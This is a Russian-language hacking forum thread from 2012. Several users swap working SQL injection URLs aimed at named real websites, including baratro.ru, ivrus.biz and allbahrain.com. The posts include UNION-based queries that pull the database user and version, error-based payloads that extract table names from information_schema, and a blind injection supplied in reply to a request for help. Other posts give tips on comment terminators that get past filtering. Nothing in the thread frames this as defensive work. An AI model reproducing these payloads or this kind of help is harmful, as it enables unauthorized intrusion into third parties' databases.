HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20201  
Старый 25.03.2012, 18:20
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
ок, а тут как?
http://baratro.ru/subcat.php?id=22'
таже самая проблема
Там легко же... =\
 
Ответить с цитированием

  #20202  
Старый 25.03.2012, 18:27
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Друзья! Не забываем про внимательность и настойчивось.

ПРОФИТ:

http://www.ivrus.biz/showphoto.php?fid=6&pid=4&id=-1+union+select+1,2,3,user(),5,6,7--+

А вообще вот так:

http://www.ivrus.biz/showcat.php?id=7+union+select+1,2,3+from+mysql.use r--+

можно понять что пользователь mysql имеет какие-то более-менее значимые привилегии в данном случае 'в слепую'.
 
Ответить с цитированием

  #20203  
Старый 25.03.2012, 18:44
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию

I need help on this one.

Код:
Code:
http://allbahrain.com/list_resturant_menu.php?resturant=1
Tried so many synthax, maybe it's tricky.
 
Ответить с цитированием

  #20204  
Старый 25.03.2012, 18:55
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от lightangel  
lightangel said:
I need help on this one.
Код:
Code:
http://allbahrain.com/list_resturant_menu.php?resturant=1
Tried so many synthax, maybe it's tricky.
http://allbahrain.com/list_resturant_menu.php?resturant=1+and+substring( version(),1,1)=5--+f
 
Ответить с цитированием

  #20205  
Старый 25.03.2012, 19:12
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от Cennarios  
Cennarios said:
Друзья! Не забываем про внимательность и настойчивось.
ПРОФИТ:
http://www.ivrus.biz/showphoto.php?fid=6&pid=4&id=-1+union+select+1,2,3,user(),5,6,7--+
хм.. действительно

Цитата:
Сообщение от Ereee  
Ereee said:
Там легко же... =\
так не

http://baratro.ru/subcat.php?id=22%27+and%28select+1+from%28select+c ount%28*%29,concat%28%28select+table_name+from+inf ormation_schema.tables+limit+0,1%29,0x00,floor%28r and%280%29*2%29%29x+from+information_schema.tables +group+by+x%29a%29--+

так тоже

http://baratro.ru/subcat.php?id=22%27+or+1+group+by+concat%28%28sele ct+version%28%29%29,0x00,floor%28rand%280%29*2%29% 29having+min%280%29+or+1--+

о, так пашет

http://baratro.ru/subcat.php?id=22'+or+(@:=1)||@+group+by+concat((se lect+version()),@:=@-1)having+@||min(@:=0)--+f

блин, чёт не пойму, @:=1 там между собакой и двоеточием должно быть имя переменной которой присваиваем еденицу, как ето конструкция ваще ваызывает вывоод?
 
Ответить с цитированием

  #20206  
Старый 25.03.2012, 19:21
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
блин, чёт не пойму, @:=1 там между собакой и двоеточием должно быть имя переменной которой присваиваем еденицу, как ето конструкция ваще ваызывает вывоод?
Ну так ты вначале переменную определяешь, как можно применять различные операции на неизвестно что.
 
Ответить с цитированием

  #20207  
Старый 25.03.2012, 19:24
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Ну так ты вначале переменную определяешь, как можно применять различные операции на неизвестно что.
никак, ет типа получается ещо один вид выода чарез ошибку?
 
Ответить с цитированием

  #20208  
Старый 26.03.2012, 04:04
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
хм.. действительно
так не
http://baratro.ru/subcat.php?id=22%27+and%28select+1+from%28select+c ount%28*%29,concat%28%28select+table_name+from+inf ormation_schema.tables+limit+0,1%29,0x00,floor%28r and%280%29*2%29%29x+from+information_schema.tables +group+by+x%29a%29--+
так тоже
http://baratro.ru/subcat.php?id=22%27+or+1+group+by+concat%28%28sele ct+version%28%29%29,0x00,floor%28rand%280%29*2%29% 29having+min%280%29+or+1--+
о, так пашет
http://baratro.ru/subcat.php?id=22'+or+(@:=1)||@+group+by+concat((se lect+version()),@:=@-1)having+@||min(@:=0)--+f
блин, чёт не пойму, @:=1 там между собакой и двоеточием должно быть имя переменной которой присваиваем еденицу, как ето конструкция ваще ваызывает вывоод?
Зачем использование переменных?

Вот все выводит:

http://baratro.ru//subcat.php?id=22'or(1)+group+by+concat(version(),f loor(rand(0)*2))having(min(0))or(1)and'

Твой запрос не работает из-за комментария:

http://baratro.ru/subcat.php?id=22'and(select+1+from(select+count(*) ,concat((select+concat(version(),0x3a)+from+inform ation_schema.tables+limit+0,1),floor(rand(0)*2))x+ from+information_schema.tables+group+by+x)a)and'

Вместо and', тот, что на конце можно использовать 100500 вариантов:

-- a

and'

and'1'='1

%23

И т.д...
 
Ответить с цитированием

  #20209  
Старый 27.03.2012, 21:28
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Привет

Подскажите как раскрутить скулю если я не могу оборвать запрос стандартными --+

+ так и выводится в ошибке как плюс

Пробовал /**/ - режется

%09...%20 и т.д. так-же выводятся в ошибке как есть

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]FROM users WHERE link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'admin'[/COLOR][COLOR="#007700"]--+[/COLOR][COLOR="#DD0000"]'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''
[/COLOR][COLOR="#0000BB"]at line 1[/COLOR][/COLOR
 
Ответить с цитированием

  #20210  
Старый 27.03.2012, 21:33
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Попробуй:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]FROM users WHERE link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'admin'[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#DD0000"]'1'[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'1[/COLOR][/COLOR] 
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ